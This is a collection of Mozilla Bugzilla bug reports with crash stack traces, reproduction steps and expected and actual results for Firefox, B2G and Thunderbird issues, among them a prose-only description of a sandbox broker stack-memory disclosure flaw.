16 libxul.so mozilla::RefPtr<mozilla::gfx::DrawTarget>::operator=(mozilla::gfx::DrawTarget*) /builds/slave/b2g_m-cen_hamachi_ntly-0000000/build/objdir-gecko/content/canvas/src/../../../dist/include/mozilla/RefPtr.h
17 libxul.so mozilla::dom::CanvasRenderingContext2D::Reset() content/canvas/src/CanvasRenderingContext2D.cpp
18 libxul.so mozilla::dom::CanvasRenderingContext2D::~CanvasRenderingContext2D content/canvas/src/CanvasRenderingContext2D.cpp
19 libxul.so mozilla::dom::CanvasRenderingContext2D::~CanvasRenderingContext2D content/canvas/src/CanvasRenderingContext2D.cpp
20 libxul.so mozilla::dom::CanvasRenderingContext2D::DeleteCycleCollectable() content/canvas/src/CanvasRenderingContext2D.cpp
21 libxul.so mozilla::dom::CanvasRenderingContext2D::cycleCollection::DeleteCycleCollectable(void*) content/canvas/src/CanvasRenderingContext2D.h
22 libxul.so SnowWhiteKiller::~SnowWhiteKiller xpcom/base/nsCycleCollector.cpp
23 libxul.so nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp
24 libxul.so nsCycleCollector_doDeferredDeletion() xpcom/base/nsCycleCollector.cpp
25 libxul.so AsyncFreeSnowWhite::Run() js/xpconnect/src/XPCJSRuntime.cpp
26 libxul.so nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp
27 libxul.so NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/b2g_m-cen_hamachi_ntly-0000000/build/objdir-gecko/xpcom/build/nsThreadUtils.cpp
28 libxul.so mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp
29 libxul.so mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp
30 libxul.so MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc
31 libxul.so MessageLoop::Run() ipc/chromium/src/base/message_loop.cc
32 libxul.so nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp
33 libxul.so XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp
34 libxul.so mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp
35 libxul.so MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc
36 libxul.so MessageLoop::Run() ipc/chromium/src/base/message_loop.cc
37 libxul.so XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp
38 plugin-container main ipc/app/MozillaRuntimeMain.cpp
39 libc.so __libc_init bionic/libc/bionic/libc_init_dynamic.c
40 @0xb00045a9
On ALCATEL ONE TOUCH FIRE
Build ID 20130910040201
Release Channel hamachi/1.2.0/nightly
More reports :
https://crash-stats.mozilla.com/report/list?product=B2G&signature=mozilla%3A%3Agl%3A%3ASharedSurface_Gralloc%3A%3A~SharedSurface_Gralloc
|
|
952,893 | 8,224,565 |
Device: Inari
Build: Gecko : HG changeset: 159455:85196889c598
Gaia : e2e7add56f545f2086ab15525ba20b111e5e386f
STR
1. Launch dialer app.
2. No matter dialer app is on foreground or background.
Expected
There is no any PCM data output to audio backend if user didn't press the key.
Actual
There is always silent PCM data output to backend.
Impact
1. This will prevent device from going to deep suspend mode. The normal sleep current will be about 2mA without SIM card attached but it will be more then 40mA in this case.
2. Also impact the idle current from about 150mA to 160mA.
Additional Notes
|
|
827,878 | 6,975,269 |
This bug was filed from the Socorro interface and is
report bp-02b12d82-5ad1-4791-98ae-495e52130108 .
=============================================================
We started seeing this crash in our WebRTC in SocialAPI demo with today's nightly (21.0a1 (2013-01-08)).
Steps to reproduce:
1. A calls B (audio+video call).
2. B accepts the call.
3. B closes the call. B usually crashes at this point.
4. The video of B is now frozen in A's floating chat window. If A closes that window, A often (but not always) crashes too.
Note: at step 3, if A closes the call, there seems to be no crash.
|
|
798,323 | 6,700,882 |
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:18.0) Gecko/18.0 Firefox/18.0
While working on the Mochitest for bug 796890 I have seen a crash on exit of the browser. Checking its details I have noticed a strange amount of running threads which were about 200 of them. I considered this as a massive leak and continued investigation.
To reproduce the thread leak you have to do the following steps:
1. Checkout the latest code from the alder tree
2. Apply the attachment 668290 from bug 795367 to add the Mochitest makefiles
3. Apply the attachment 668414 of the video and audio peer connection WIP test
4. Run: TEST_PATH=dom/tests/mochitest/media/test_peerconnection_videoAudio.html make -C $(OBJ) mochitest-plain
5. Reload the page a couple of times or open new tabs with the test loaded
6. Close all the tabs
7. Shutdown Firefox
It doesn't matter how long you wait the aquired threads are never released. Each time you load the test the number of thread will be increased by about 15.
The crash information for my debug build is not that helpful so far:
Operating system: Mac OS X
10.7.5 11G56
CPU: amd64
family 6 model 42 stepping 7
4 CPUs
Crash reason: EXC_BAD_ACCESS / KERN_INVALID_ADDRESS
Crash address: 0x0
Thread 15 (crashed)
0 XUL + 0x267f168
rbx = 0x0000000000001000 r12 = 0x0000000000000046
r13 = 0x0000000000000046 r14 = 0x000000013d7dd000
r15 = 0x00007fff7f2040a8 rip = 0x0000000103a4f168
rsp = 0x000000013671aef0 rbp = 0x000000013671b150
Found by: given as instruction pointer in context
I will try to get more details. Also I will make it a standalone testcase so that steps 1-3 are not necessary.
I consider this important enough to ask for blocking Firefox 18.0.
|
|
816,640 | 6,865,450 |
While working on my first peer connection Mochitest I hit this assertion and shutdown crash. The reduced testcase can be found attached. I will give more details once I got a better stack as the one below.
This crash only happens because the variable of the peer connection instance is declared in the global scope. Once I move it into the runTest() method no crash happens anymore.
Thread 0 (crashed)
0 XUL!mozilla::nrappkitTimerCallback::Release() [nr_timer.cpp : 46 + 0x0]
rbx = 0x0000000000000000 r12 = 0x0000000000000000
r13 = 0x0000000000000000 r14 = 0x0000000000000000
r15 = 0x0000000000000000 rip = 0x00000001043f907e
rsp = 0x00007fff5fbfe280 rbp = 0x00007fff5fbfe2c0
Found by: given as instruction pointer in context
1 XUL!nsTArray<nsTimerImpl*, nsTArrayDefaultAllocator>::ElementAt(unsigned int) [nsTArray.h : 539 + 0xc]
rip = 0x00000001037c3ac1 rsp = 0x00007fff5fbfe2a0
rbp = 0x00007fff5fbfe2c0
Found by: stack scanning
2 XUL!nsTimerImpl::ReleaseCallback() [nsTimerImpl.h:eb8da53904eb : 78 + 0x13]
rip = 0x00000001037c1112 rsp = 0x00007fff5fbfe2d0
rbp = 0x00007fff5fbfe2f0
Found by: stack scanning
3 XUL!TimerThread::Shutdown() [TimerThread.cpp:eb8da53904eb : 154 + 0x8]
rip = 0x00000001037c2108 rsp = 0x00007fff5fbfe300
rbp = 0x00007fff5fbfe360
Found by: stack scanning
4 libnspr4.dylib!_PR_Mach_GetInterval [darwin.c:eb8da53904eb : 36 + 0x8]
rip = 0x000000010053d8ad rsp = 0x00007fff5fbfe330
rbp = 0x00007fff5fbfe360
Found by: stack scanning
5 XUL!nsTimerImpl::Shutdown() [nsTimerImpl.cpp:eb8da53904eb : 247 + 0xb]
rip = 0x00000001037bf9c0 rsp = 0x00007fff5fbfe370
rbp = 0x00007fff5fbfe390
Found by: stack scanning
6 XUL!mozilla::ShutdownXPCOM(nsIServiceManager*) [nsXPComInit.cpp:eb8da53904eb : 570 + 0xa]
rip = 0x000000010372d48f rsp = 0x00007fff5fbfe3a0
rbp = 0x00007fff5fbfe4f0
Found by: stack scanning
7 XUL!nsObserverService::Release() [nsObserverService.cpp:eb8da53904eb : 51 + 0x2c]
rip = 0x0000000103751740 rsp = 0x00007fff5fbfe3c0
rbp = 0x00007fff5fbfe4f0
Found by: stack scanning
8 XUL!nsCOMPtr<nsIObserverService>::~nsCOMPtr() [nsCOMPtr.h : 494 + 0x12]
rip = 0x000000010127705b rsp = 0x00007fff5fbfe400
rbp = 0x00007fff5fbfe4f0
Found by: stack scanning
9 XUL!nsCOMPtr<nsIObserverService>::~nsCOMPtr() [nsCOMPtr.h : 491 + 0x4]
rip = 0x0000000101273315 rsp = 0x00007fff5fbfe430
rbp = 0x00007fff5fbfe4f0
Found by: stack scanning
10 XUL + 0x24f3faf
rip = 0x0000000103751fb0 rsp = 0x00007fff5fbfe470
rbp = 0x00007fff5fbfe4f0
Found by: stack scanning
11 XUL!NS_ShutdownXPCOM_P [nsXPComInit.cpp:eb8da53904eb : 513 + 0x8]
rip = 0x000000010372d1c5 rsp = 0x00007fff5fbfe500
rbp = 0x00007fff5fbfe510
Found by: stack scanning
|
|
820,978 | 6,907,591 |
As I have mentioned on bug 818801 it takes a long time until the gUM notification comes up. When I quit Firefox before that time it crashes.
Steps:
1. Open attachment 689100
2. Click start
3. Quit Firefox immediately
Report: bp-b8fa9756-26b7-4af8-930a-18b402121212
Stack:
0 libnspr4.dylib PR_Unlock ptsynch.c:199
1 XUL mozilla::MediaEngineWebRTC::EnumerateAudioDevices Mutex.h:83
2 XUL mozilla::GetUserMediaDevicesRunnable::Run MediaManager.cpp:650
3 XUL nsThread::ProcessNextEvent nsThread.cpp:627
4 XUL NS_ProcessNextEvent_P nsThreadUtils.cpp:221
5 XUL nsThread::ThreadFunc nsThread.cpp:265
6 libnspr4.dylib _pt_root ptthread.c:156
7 libsystem_c.dylib libsystem_c.dylib@0x4e8be
8 libsystem_c.dylib libsystem_c.dylib@0x51b74
9 libnspr4.dylib libnspr4.dylib@0x1dacf
|
|
821,071 | 6,908,548 |
Created attachment 691553
callstack
./media/webrtc/signaling/src/sipcc/core/gsm/lsm.c:650
// Check that we got a valid address and port
if (default_addr && (strlen(default_addr) > 0) && (port_allocated != -1)) {
|
|
805,112 | 6,759,973 |
I unfortunately don't have steps to reproduce this crash (https://crash-stats.mozilla.com/report/index/bp-fa2b2f7d-1fb4-4797-853f-301632121024)
It happened while I was playing with/debugging https://github.com/anantn/socialapi-demo
I think I restarted the browser while I had an ongoing video stream displayed in a social API chat window.
|
|
805,251 | 6,761,157 |
https://crash-stats.mozilla.com/report/index/bp-c0c033e9-7534-45d1-813a-077612121024
https://crash-stats.mozilla.com/report/index/bp-2c4957dd-2388-450e-9ef1-5a6a62121024
This happened when restarting the browser, I was experimenting with adding a data channel to https://github.com/anantn/socialapi-demo
|
|
808,546 | 6,792,736 |
Created attachment 678289
callstack
Tested with m-c changeset: 112272:ab099c9e1a09
|
|
699,526 | 5,824,398 |
This query times out.
Steps to reproduce:
1. https://mozillians.org/en-US/search?q=staff
--
[12:07:13.752] GET https://mozillians.org/en-US/search?q=staff [undefined 40668ms]
|
|
691,215 | 5,753,250 |
Created attachment 564094
FF_fail.txt
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Build ID: 20110928134238
Steps to reproduce:
Tried using a bookmarklet that worked fine in FF 6.x
Actual results:
FF crashes (tried in both W2K and 64 bit Win 7)
Expected results:
Should have worked - returns a link from within the XML document. I think it fails at: document.replaceChild(f,document.firstChild)
|
|
693,228 | 5,770,714 |
Steps to reproduce:
1. Open a page with Flash content (i.e. YouTube)
2. Close the tab
3. Re-open the tab, or navigate to a new page with Flash content
Expected results:
The page and Flash content loads
Actual results:
Firefox hangs until the plugin-container process is killed or IPC child timeout is reached (45 seconds).
This looks to be IPC related because the problem goes away when dom.ipc.plugins.enabled is set to false.
This also does not look to be related to the recent Flash 11 release, as I tried using a older version of Flash and it still hung.
2011-10-07-03-12-27 Linux 64 build ok:
http://hg.mozilla.org/mozilla-central/rev/c3a50afc2243
2011-10-08-03-09-46 Linux 64 build hangs:
http://hg.mozilla.org/mozilla-central/rev/6c780dcb4b99
Regression window:
http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=c3a50afc2243&tochange=6c780dcb4b99
|
|
642,851 | 5,353,524 |
Firefox fails to redraw the bottommost row of pixels on the screen
when the
- Windows taskbar is not at the bottom,
- Taskbar auto-hide is enabled, and
- Firefox window is maximized.
(The task bar can be dragged to any of the four edges of the screen.
Auto-hide reduces the taskbar to a line 2 pixels high or wide at that edge, and shows the full taskbar when the mouse hovers over it. Apparently Firefox assumes the taskbar is always at the bottom when auto-hide is enabled.)
Steps to reproduce:
0. (Arrange so bottom row of pixels on screen is not just one color, say by
having a blue background and contrasting white non-firefox window covering
different parts of bottom row of pixels.)
1. Drag windows task bar to edge of screen other than the bottom edge.
(for example, the left edge).
2. Right click on task bar, click "Properties", enable "Auto-hide the taskbar".
("taskbar always on top" is also enabled)
3. Open a Firefox window and maximize it. (Click the one-window button next to
the close box in the titlebar.)
Actual Result:
The bottom row of pixels on the screen is not redrawn.
The (blue) background and (white) window are visible in this row of pixels.
Expected Result:
A maximized window should fill the screen so the background and other windows are not visible. (Except for the auto-hidden taskbar strip on the right edge of screen.)
Other programs handle this correctly.
(Speculation: Maybe FireFox assumes that an auto-hidden taskbar is always at the bottom edge of screen. Instead, it should determine where the taskbar is located.)
|
|
646,168 | 5,378,266 |
crash [@ @0x0 | nsMsgXFViewThread::RemoveChildHdr(nsIMsgDBHdr*, nsIDBChangeAnnouncer*)]
from crash-stats.
nsMsgXFViewThread::RemoveChildHdr(nsIMsgDBHdr*, nsIDBChangeAnnouncer*) has the same stack
this module has many crashes sigs (at least 4) per https://bugzilla.mozilla.org/buglist.cgi?type1-0-0=anywordssubstr&field0-0-0=short_desc&bug_severity=critical&bug_severity=major&bug_severity=normal&type0-0-1=substring&field0-0-1=keywords&type1-0-1=substring&value1-0-1=backend&resolution=---&classification=Client%20Software&classification=Components&query_format=advanced&value1-0-0=virtual%20saved%20XFView&longdesc=virtual%20XFView&value0-0-1=crash&type0-0-0=anywordssubstr&value0-0-0=crash%20segfault&field1-0-0=short_desc&product=MailNews%20Core&product=Thunderbird&longdesc_type=anywordssubstr&field1-0-1=component
262af427-7dde-4bf6-9846-c45d62110329
EXCEPTION_ACCESS_VIOLATION_READ
0x0
0 @0x0
1 thunderbird.exe nsMsgXFViewThread::RemoveChildHdr mailnews/base/src/nsMsgXFViewThread.cpp:346
2 thunderbird.exe nsMsgSearchDBView::OnHdrDeleted mailnews/base/src/nsMsgSearchDBView.cpp:266
3 thunderbird.exe nsMsgDatabase::NotifyHdrDeletedAll mailnews/db/msgdb/src/nsMsgDatabase.cpp:724
4 thunderbird.exe nsMsgDatabase::DeleteHeader mailnews/db/msgdb/src/nsMsgDatabase.cpp:1810
5 thunderbird.exe nsMsgDatabase::DeleteMessages mailnews/db/msgdb/src/nsMsgDatabase.cpp:1753
6 thunderbird.exe nsImapMailFolder::CopyMessagesOffline mailnews/imap/src/nsImapMailFolder.cpp:7178
7 thunderbird.exe nsImapMailFolder::CopyMessages mailnews/imap/src/nsImapMailFolder.cpp:7336
8 thunderbird.exe nsMsgCopyService::DoNextCopy mailnews/base/src/nsMsgCopyService.cpp:321
9 thunderbird.exe nsMsgCopyService::DoCopy mailnews/base/src/nsMsgCopyService.cpp:263
10 thunderbird.exe nsMsgCopyService::CopyMessages mailnews/base/src/nsMsgCopyService.cpp:531
11 thunderbird.exe nsImapMailFolder::DeleteMessages mailnews/imap/src/nsImapMailFolder.cpp:2405
12 thunderbird.exe nsMsgSearchDBView::ProcessRequestsInOneFolder mailnews/base/src/nsMsgSearchDBView.cpp:1097
13 thunderbird.exe nsMsgSearchDBView::DeleteMessages mailnews/base/src/nsMsgSearchDBView.cpp:908
14 thunderbird.exe nsMsgDBView::ApplyCommandToIndices mailnews/base/src/nsMsgDBView.cpp:2726
15 thunderbird.exe nsMsgDBView::DoCommand mailnews/base/src/nsMsgDBView.cpp:2393
16 thunderbird.exe nsMsgSearchDBView::DoCommand mailnews/base/src/nsMsgSearchDBView.cpp:807
nsMsgXFViewThread::RemoveChildHdr(nsIMsgDBHdr*, nsIDBChangeAnnouncer*)
bpf913b143-3f4f-490c-9441-2746d2110329
EXCEPTION_ACCESS_VIOLATION_EXEC
0x206f6f74
0 @0x206f6f74
1 thunderbird.exe nsMsgXFViewThread::RemoveChildHdr mailnews/base/src/nsMsgXFViewThread.cpp:346
2 thunderbird.exe nsMsgSearchDBView::OnHdrDeleted mailnews/base/src/nsMsgSearchDBView.cpp:266
3 thunderbird.exe nsMsgDatabase::NotifyHdrDeletedAll mailnews/db/msgdb/src/nsMsgDatabase.cpp:724
4 thunderbird.exe nsMsgDatabase::DeleteHeader mailnews/db/msgdb/src/nsMsgDatabase.cpp:1810
5 thunderbird.exe nsMsgDatabase::DeleteMessages mailnews/db/msgdb/src/nsMsgDatabase.cpp:1753
6 thunderbird.exe nsImapMailFolder::CopyMessagesOffline mailnews/imap/src/nsImapMailFolder.cpp:7178
7 thunderbird.exe nsImapMailFolder::CopyMessages mailnews/imap/src/nsImapMailFolder.cpp:7336
8 thunderbird.exe nsMsgCopyService::DoNextCopy mailnews/base/src/nsMsgCopyService.cpp:321
9 thunderbird.exe nsMsgCopyService::DoCopy mailnews/base/src/nsMsgCopyService.cpp:263
10 thunderbird.exe nsMsgCopyService::CopyMessages mailnews/base/src/nsMsgCopyService.cpp:531
11 thunderbird.exe nsImapMailFolder::DeleteMessages mailnews/imap/src/nsImapMailFolder.cpp:2405
12 thunderbird.exe nsMsgSearchDBView::ProcessRequestsInOneFolder mailnews/base/src/nsMsgSearchDBView.cpp:1097
13 thunderbird.exe nsMsgSearchDBView::DeleteMessages mailnews/base/src/nsMsgSearchDBView.cpp:908
14 thunderbird.exe nsMsgDBView::ApplyCommandToIndices mailnews/base/src/nsMsgDBView.cpp:2726
15 thunderbird.exe nsMsgDBView::DoCommand mailnews/base/src/nsMsgDBView.cpp:2393
16 thunderbird.exe nsMsgSearchDBView::DoCommand mailnews/base/src/nsMsgSearchDBView.cpp:807
|
|
1,854,243 | 16,586,598 |
Pre-requisites: opt-into a Firefox experience, open up a PDP with the review checker sidebar.
**Steps to reproduce**
1. Opt out of the review checker via sidebar settings or by flipping a pref in about:config
**Expected result**
1. Review checker sidebar is closed and user is opted out, but its URL bar icon persists.
2. Upon clicking on the URL bar icon, the user is prompted to opt in again.
**Actual result**
1. URL bar icon is no longer available to the opted-out user.
|
|
1,854,257 | 16,586,677 |
Created attachment 9354206
sidebar
(macOS Monterey user).
**Steps to reproduce**
1. Opt-in, then opt-out from review checker (either via about config or settings).
2. Change *browser.shopping.experience2023.optedIn* state from 2 to 0.
3. Load a PDP, click the url bar icon.
**Expected result**
1. Opt-in card is displayed in the sidebar
2. Upon clicking "yes, try it" opt-in card is dissmissed and is replaced by one of the product analysis states.
**Actual result**
1. Opt-in card does not get dismissed after clicking “Yes, try it”, resulting in the attached sidebar states.
2. The situation persists on all subsequently opened PDP pages.
|
|
1,855,049 | 16,592,985 |
Created attachment 9354946
lostfilm.info.JPG
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Steps to reproduce:
Зашёл на сайт https://www.lostfilm.tv/, авторизовался - всё нормально. Перехожу с него на дочерний сайт http://lostfilm.info/news/ - на каждой новости требует авторизацию.
I went to the website https://www.lostfilm.tv/, logged in - everything was fine. I go from it to the subsidiary site http://lostfilm.info/news/ - each news requires authorization.
Actual results:
Перехожу с https://www.lostfilm.tv/ на дочерний сайт http://lostfilm.info/news/ - на каждой новости требует авторизацию. При попытке авторизоваться перенаправляет обратно на https://www.lostfilm.tv/, где я уже авторизован. И так по кругу.
I go from https://www.lostfilm.tv/ to the subsidiary site http://lostfilm.info/news/ - each news requires authorization. When I try to log in, it redirects back to https://www.lostfilm.tv/, where I am already logged in. And so on in a circle.
Expected results:
Переход с https://www.lostfilm.tv/ на любую новость на сайте http://lostfilm.info/news/ должен быть с автоматической авторизацией.
На Firefox 91 это работает.
На Centbrowser_5.0.1002.354_x64 это работает.
На Firefox 115 это НЕ работает.
The transition from https://www.lostfilm.tv/ to any news on the site http://lostfilm.info/news/ must be with automatic authorization.
This works on Firefox 91.
It works on Centbrowser_5.0.1002.354_x64.
This does NOT work on Firefox 115.
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.2
|
|
1,855,151 | 16,593,594 |
on latest build, the Alpenglow theme does not apply properly (nor do https://addons.mozilla.org/en-US/firefox/addon/save-the-bees-plz/ for example)
|
|
1,855,306 | 16,594,641 |
The problem is in [these lines of code][misuse], added in 2016 in bug 1289718. The value of `req.mBufSize` is controlled by the client, which could be hostile; thus, the resulting iovec could read stack memory beyond the end of the buffer and send it to a compromised child process.
I *think* the severity is limited here because [it's a stack buffer][buf], and it's running on a dedicated thread. (I've considered moving that buffer to the heap and/or combining all the broker threads into one `epoll` loop, to reduce memory usage, but (fortunately?) I haven't done any of that yet.) Assuming that the stack is separated from other memory mappings via a guard page, then the memory that can be disclosed is limited to the calling thread's own stack. I don't think that that can contain anything that could be used to escalate privileges (like IPC channel endpoint IDs), but I don't know how certain I should be of that. If it matters, these threads don't use the XPCOM event loop or anything like that; they're just hand-written loops around `recvmsg`.
Any fix for this will probably make the bug fairly obvious. There's a non-security bug with `readlink` handling that I'm working on, and I could include a general bounds check on `mBufSize` which would conveniently also fix this bug, but that would make it harder to uplift and I don't know if the severity of this bug is enough to justify that kind of thing. All told, I'd prefer to just fix this as its own commit.
[misuse]: https://searchfox.org/mozilla-central/rev/57f6fbd39c0b5957e11b27b4db58b821d8e1607d/security/sandbox/linux/broker/SandboxBroker.cpp#883-884
[buf]: https://searchfox.org/mozilla-central/rev/57f6fbd39c0b5957e11b27b4db58b821d8e1607d/security/sandbox/linux/broker/SandboxBroker.cpp#710
|
|
1,855,545 | 16,596,345 |
The ShoppingUtils.init code assumes that `NimbusFeatures.shopping2023.onUpdate(callback)` does not immediately invoke the callback when it is called, but it does. This leads to a "too much recursion" error on startup if enrolled in the beta test experiment, following these steps:
1. In about:config set `nimbus.debug` to `true`
2. open about:studies?optin_slug=review-checker-first-beta-119&optin_branch=treatment-a&optin_collection=nimbus-preview
3. restart the browser
4. look in the browser toolbox, observe a "Too much recursion" error calling the following functions in a loop:
```
InternalError: too much recursion
_onFeatureUpdate resource://nimbus/lib/ExperimentStore.sys.mjs:389
onUpdate resource://nimbus/ExperimentAPI.sys.mjs:472
init resource:///modules/ShoppingUtils.sys.mjs:61
onNimbusUpdate resource:///modules/ShoppingUtils.sys.mjs:43
_onFeatureUpdate resource://nimbus/lib/ExperimentStore.sys.mjs:389
onUpdate resource://nimbus/ExperimentAPI.sys.mjs:472
init resource:///modules/ShoppingUtils.sys.mjs:61
onNimbusUpdate resource:///modules/ShoppingUtils.sys.mjs:43
...
```
The problem here is that `ShoppingUtils.init`, inside the `if (!this.registered)` block, doesn't immediately set `this.registered = true`, but instead does:
```
if (!this.registered) {
lazy.NimbusFeatures.shopping2023.onUpdate(this.onNimbusUpdate);
this._updateNimbusVariables();
this.registered = true;
}
```
It turns out that the `onUpdate` call immediately invokes `this.onNimbusUpdate`, which in turn calls `ShoppingUtils.init`, causing an infinite loop.
We can fix this by moving the `this.registered = true` line to the top of the block.
|
|
1,855,650 | 16,596,998 |
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Steps to reproduce:
In about:config I have negotiate enabled:
network.negotiate-auth.trusted-uris = 127.0.0.1,otherserver.mydomain
My local website http://127.0.0.1 sends a request to https://otherserver.mydomain
The remote website answers with WWW-Authenticate: Negotiate
The request is sent like this from my local website:
let response = await fetch("https://otherserver.mydomain", {
method: "GET",
cache: "no-store",
credentials: "include"
});
Actual results:
Since Firefox 118 no negotiate is done.
Expected results:
In Chrome and until Firefox 117 negotiate is done.
I've already confirmed that the bug was introduced with Firefox 118 by comparing the portable versions of Firefox 117 with Firefox 118.
The same website and the same Firefox configuration (empty profile, just added the configuration above) worked in 117, but doesn't work in 118, if the request was sent cross-site.
When I open the URL manually in a separate tab, negotiate is done. But not cross-site via fetch-API.
|
|
1,859,582 | 16,627,203 |
Created attachment 9358902
unenrolling from the experiment.mp4
**[Notes]**
- We have also noticed that sometimes we need a few Firefox restarts until we are naturally enrolled in the experiment, we have the following message in the browser console "did not match due to targeting". It is strange that we don't change anything and after multiple restarts, we are naturally enrolled. Sometimes we need 5 restarts, sometimes 2 restarts until we are enrolled.
- After we are naturally enrolled in the experiment, usually after dismissing a Sponsored results and we restart the browser, we are automatically unenrolled from the experiment.
- This bug is related to the targeting, and I think that the following pref from the targeting is the cause ('browser.urlbar.suggest.quicksuggest.sponsored'|preferenceValue).
- The issue is NOT reproducible with force enrollment.
**[Affected versions]**
- Firefox 119.0 RC build 1.
- Firefox Nightly 120.0a1 (Build ID: 20231017095050)
**[Affected platforms]**
- Windows 10 x64
- macOS 13.5
- Ubuntu 22.04
**[Prerequisites]**
Have the following prefs set:
- browser.search.region set to "US"
Have the following user.js downloaded to naturally enroll in the experiment [user.js](https://drive.google.com/file/d/1EcCPTt8eHCqQDWWDLGKC3w9MS0iLBFbn/view?usp=sharing).
**[Steps to reproduce]**
1. Open the Firefox build with the prefs mentioned in the prerequisites.
2. From the about:support page, at the "Profile Folder" section click the "Open Folder" button.
3. Paste the user.js from the prerequisites and restart the browser.
4. [Optional] If not enrolled, restart the browser a few times. If enrolled in the Weather experiment remove it and restart the browser.
5. After enrolling in the experiment, type in the address bar "Nike".
6. Dismiss the Nike sponsored result.
7. Restart the browser.
8. Navigate to about:studies and observe the page.
**[Expected results]**
- You are still enrolled in the Higher Placement for Sponsored Suggestion experiment
**[Actual results]**
- You are no longer enrolled in the Higher Placement for Sponsored Suggestion experiment, the experiment is marked as complete.
**[Additional Notes]**
- Attached is a screen recording of the issue. In the screen recording can be observed that I need two restarts until I am enrolled in the experiment and then after two restarts, I am unenrolled from the experiment.
|
|
1,859,794 | 16,628,713 |
Created attachment 9359110
rec of the issue.gif
**[Notes]:**
- We have observed in the [experimenter ticket](https://experimenter.services.mozilla.com/nimbus/set-default-pdf-handler-with-annotations/summary) that the id from the "dismiss_button" area of the PDF Handler message value from Treatment A is set to "NEWTAB_POCKET_TOPICS_SURVEY" instead of "PDF_HANDLER_ANNOTATIONS:treatment_a".
**[Affected versions]:**
- Firefox Release 118.0.2 - Build ID: 20231009140911
- Firefox RC 119.0 - Build ID: 20231013091412
**[Affected Platforms]:**
- Windows 10 x64
**[Prerequisites]:**
- Have a Firefox profile with the following prefs in the "about:config" page:
- `nimbus.debug` set to `true`
- `browser.newtabpage.activity-stream.asrouter.devtoolsEnabled` set to `true`
**[Steps to reproduce]:**
1. Open the browser with the profile from prerequisites.
2. Navigate to "about:studies?optin_slug=set-default-pdf-handler-with-annotations&optin_branch=treatment-a&optin_collection=nimbus-preview".
3. Navigate to the "about:newtab#devtools" page and search for the "PDF_HANDLER_ANNOTATIONS:treatment_a" message.
4. Click the "Show" button from the message section.
5. Click the "X" button from the top-right part of the "PDF Handler".
6. Observe the message from the "AS Router Admin"
**[Expected result]:**
- The message section is grayed out and the "Unblock" button is displayed.
**[Actual result]:**
- Nothing happens, the message remains active.
**[Additional Notes]:**
- Due to this issue the message will be displayed to users each time an URL ending in pdf will be accessed and may harm the user experience.
- This issue is not reproducible with the Treatment B branch of the experiment. The "PDF_HANDLER_ANNOTATIONS:treatment_b" is blocked if the "X" button is clicked.
- Attached a screen recording of the issue.
|
|
1,860,227 | 16,631,077 |
Created attachment 9359520
treatA.esc.2150.gif
**[Affected versions]:**
- Firefox Release 118.0.2 - Build ID: 20231009140911
- Firefox RC 119.0 - Build ID: 20231013091412
**[Affected Platforms]:**
- Windows 10 x64, Windows 11 x64
**[Prerequisites]:**
- Have a Firefox profile with the following prefs in the "about:config" page:
- nimbus.debug set to true
- browser.newtabpage.activity-stream.asrouter.devtoolsEnabled set to true
**[Steps to reproduce]:**
1. Open the browser with the profile from prerequisites.
2. Navigate to "about:studies?optin_slug=set-default-pdf-handler-with-annotations&optin_branch=treatment-a&optin_collection=nimbus-preview".
3. Navigate to the "about:newtab#devtools" page and search for the "PDF_HANDLER_ANNOTATIONS:treatment_a" message.
4. Click the "Show" button from the message section.
5. Press the "Esc" key from the top-right part of the "PDF Handler".
6. Observe the message from the "AS Router Admin"
**[Expected result]:**
- The message section is grayed out and the "Unblock" button is displayed.
**[Actual result]:**
- Nothing happens, the message remains active.
**[Notes]:**
- Due to this issue the message will be displayed to users each time an URL ending in pdf will be accessed and may harm the user experience.
- This issue is not reproducible with the Treatment B branch of [the experiment](https://mozilla-hub.atlassian.net/browse/QA-2150). The "PDF_HANDLER_ANNOTATIONS:treatment_b" is blocked if the "Esc" key is pressed.
- Attached a screen recording of the issue.
|
|
1,860,271 | 16,631,409 |
Created attachment 9359549
rec of the issue.gif
**[Notes]:**
- We have observed that the "Open Firefox automatically when your computer starts" option from the "about:preferences" page is unchecked and the
`browser.startup.windowsLaunchOnLogin.disableLaunchOnLoginPrompt` pref is set to `false` at browser startup even if Firefox is added as a startup app.
**[Affected versions]:**
- Firefox Nightly 120.0a1 - Build ID: 20231019213231
**[Affected Platforms]:**
- Windows 10 x64
- Windows 11 64
**[Prerequisites]:**
- Firefox is set as the default browser app.
- Firefox is added as a Windows startup app.
- Have the `app.update.channel` pref set to `beta` in the "about:config" page.
- Have the following [user.js](https://drive.google.com/file/d/1GOD96udkd03J-RNGTMsn6y_HFWn6nyMD/view?usp=sharing) file saved to your pc.
**[Steps to reproduce]:**
1. Open the browser with the profile from prerequisites.
2. Navigate to the profile folder and paste the user.js file from the prerequisites.
3. Restart the browser and open a New Tab.
4. Observe the upper part of the browser.
**[Expected result]:**
- The "Launch on Longin" infobar is not triggered as Firefox is already added as a startup app.
**[Actual result]:**
- The "Launch on Login" infobar is triggered even if Firefox is already added as a Windows startup app
**[Additional Notes]:**
- Due to this issue the message will be displayed to clients that already have Firefox as a startup app and may harm the user experience.
- Attached a screen recording of the issue.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.